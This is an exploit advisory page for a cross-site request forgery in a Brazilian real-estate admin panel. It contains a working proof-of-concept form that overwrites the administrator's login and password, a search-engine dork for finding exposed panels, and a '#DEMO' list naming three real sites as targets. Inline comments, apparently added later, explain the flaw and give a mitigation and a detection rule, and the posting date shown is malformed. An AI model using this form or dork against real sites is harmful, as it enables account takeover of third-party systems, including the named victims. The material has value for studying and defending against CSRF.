
PAINEL DE CONTROLE - Add Admin CSRF

Posted on 30 November -0001

<!--
  Advisory page for a cross-site request forgery (CSRF) report, kept as its
  author published it. The outer BODY holds three parts in order: the author's
  plain-text header, a second complete HTML document introduced by "Code :",
  and a "#DEMO" list of URLs.
  The nested document looks like a copy of the panel's own "Alterar meus dados
  do administrador" page: a side menu, a search form, and the credential form
  named "editsenha".
  Exposure note for operators: the header's search strings match the panel's
  /adm/login.php page, so an admin login page that search engines have indexed
  can be found that way; limiting who can reach /adm/ reduces that exposure.
-->
<HTML>
<HEAD>
<TITLE>PAINEL DE CONTROLE - Add Admin (CSRF)</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
</HEAD>
<BODY>
_____________________________________________________________
#Exploit Title: PAINEL DE CONTROLE - Add Admin (CSRF)
#Exploit Author : BlackErroR
#Telegram : @BlackErroR1
#Exploit Dork: inurl:"/adm/login.php" intext:"PAINEL DE CONTROLE"
#Tested On: Win 7/Firefox
#VendorHomePage : http://www.sistemas.noisketa.com.br/
#Date: 1/14/2017
#Video Training : http://opizo.com/RgS2Hw
_______________________________________________________________
Code :
<!--
  Start of the nested document. It declares iso-8859-1 while the outer page
  declares utf-8. NOTE(review): the "?" in "In?cio" and "conte?do" below looks
  like a character lost in that conversion (presumably "Início" and
  "conteúdo"); confirm against the original panel page.
-->
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>Sistema de Administra&ccedil;&atilde;o de Im&oacute;ves</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
  <link href="css.css" rel="stylesheet" type="text/css" />
  <script src="js/funcoes.js" type="text/javascript"></script>
</head>
<body>
  <table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" class="borda">
    <!--DWLayoutTable-->
    <tr>
      <td height="57" colspan="3" valign="top" class="borda2"><img src="imagens/img-topo-adm.jpg"></td>
    </tr>
    <tr>
      <td width="200" rowspan="6" valign="top" class="borda_menu">
        <style type="text/css">
          #menuAdm{ width:200px; height:25px; text-align:center; background-color:#CCC; color:#000; border:solid 1px; border-color:#333; font-size:14px; padding:12px; list-style:none; }
          li:hover{ background-color:#666; }
          a:hover{ font-weight:bold; color:#FFF; text-decoration:none; }
        </style>
        <div align="left">
          <!-- Side menu of the panel. Every item reuses id="menuAdm", so the id is not unique in this document. -->
          <ul>
            <li id="menuAdm"><a href="index.php" class="menu_admin">In?cio</a></li>
            <li id="menuAdm"><a href="imoveis_tipo.php" class="menu_admin">Tipos de im&oacute;veis</a></li>
            <li id="menuAdm"><a href="negocio.php" class="menu_admin">Tipos de neg&oacute;cios</a></li>
            <li id="menuAdm"><a href="cidades.php" class="menu_admin">Cidades</a></li>
            <li id="menuAdm"><a href="bairros.php" class="menu_admin">Bairros</a></li>
            <li id="menuAdm"><a href="imoveis.php" class="menu_admin">Gerenciar im&oacute;veis</a></li>
            <li id="menuAdm"><a href="newslleter.php" class="menu_admin">Novidades</a></li>
            <li id="menuAdm"><a href="empresa.php" class="menu_admin">Configurar Dados da Empresa</a></li>
            <li id="menuAdm"><a href="servicos.php" class="menu_admin">Servicos</a></li>
            <li id="menuAdm"><a href="user.php" class="menu_admin">Alterar senha</a></li>
            <li id="menuAdm"><a href="sair.php" class="menu_admin"><font color="#FF0000"><strong>Sair do sistema</strong></font></a></li>
          </ul>
        </div>
        <span style="margin-left:25px;" class="busca_imovel_pag_detalhes">Buscar por c&oacute;digo</span>
        <!-- Search-by-code form of the panel; it posts the single field "cbusca" to buscar.php. -->
        <form name="fbusca" id="fbusca" action="buscar.php" class="menu_admin" method="post" style="margin: 0; margin-left:25px;" >
          <input type="text" name="cbusca" id="cbusca" class="campos_imovel_detalhes"/><br />
          <input type="submit" name="submit" id="submit" value="Buscar" />
        </form>
      </td>
    </tr>
    <tr>
      <td colspan="4" valign="top">
        <!-- content -->
        <div style="margin-left:10px;" align="left">
          <span class="titulos-adm">&raquo; Alterar meus dados do administrador</span>
          <p>Alterar seus dados de acesso</p>
          <!--
            The form this advisory is about. It sends login, login2, senha and
            senha2 by POST to user.php?acao=edit. It has no hidden anti-CSRF
            token field and no field for the current password, and each value
            is pre-filled with ".".
            The advisory title says the endpoint accepts this request when it
            is sent cross-site from a logged-in administrator's browser. The
            server code is not shown here, so that is the author's claim and
            is not demonstrated by this page.
            Mitigation is server-side: a per-session token verified on every
            state-changing request, SameSite on the session cookie, an Origin
            or Referer check, and re-entry of the current password before
            credentials change.
            Detection: POST requests to user.php?acao=edit whose Origin or
            Referer header is not the panel's own host.
          -->
          <fieldset><legend>ALTERAR DADOS</legend>
            <form name="editsenha" method="post" action="site/adm/user.php?acao=edit">
              <label><b>Usu&aacute;rio</b></label><br />
              <input type="text" name="login" value="." maxlength="14" size="70" /><br /><br />
              <label><b>Confirmar usu&aacute;rio</b></label><br />
              <input type="text" name="login2" value="." maxlength="14" size="70" /><br /><br />
              <label><b>Senha</b></label><br />
              <input type="password" name="senha" value="." maxlength="14" size="70" /><br /><br />
              <label><b>Confirmar senha</b></label><br />
              <input type="password" name="senha2" value="." maxlength="14" size="70" /><br /><br />
              <input type="submit" name="submit" value="Alterar senha" />
            </form>
          </fieldset>
          <!-- end of content -->
        </div>
      </td>
    </tr>
  </table>
</body>
</html>
______________________________________________________________
#DEMO
[+]http://rcborgesconstrutora.com.br/site/adm/login.php
[+]http://www.marcosrodriguesdearaujo.com.br/imovel/adm/login.php
[+]http://gruposouzaimoveis.com.br/adm/login.php
__________________________________________________________________</BODY></HTML>

 
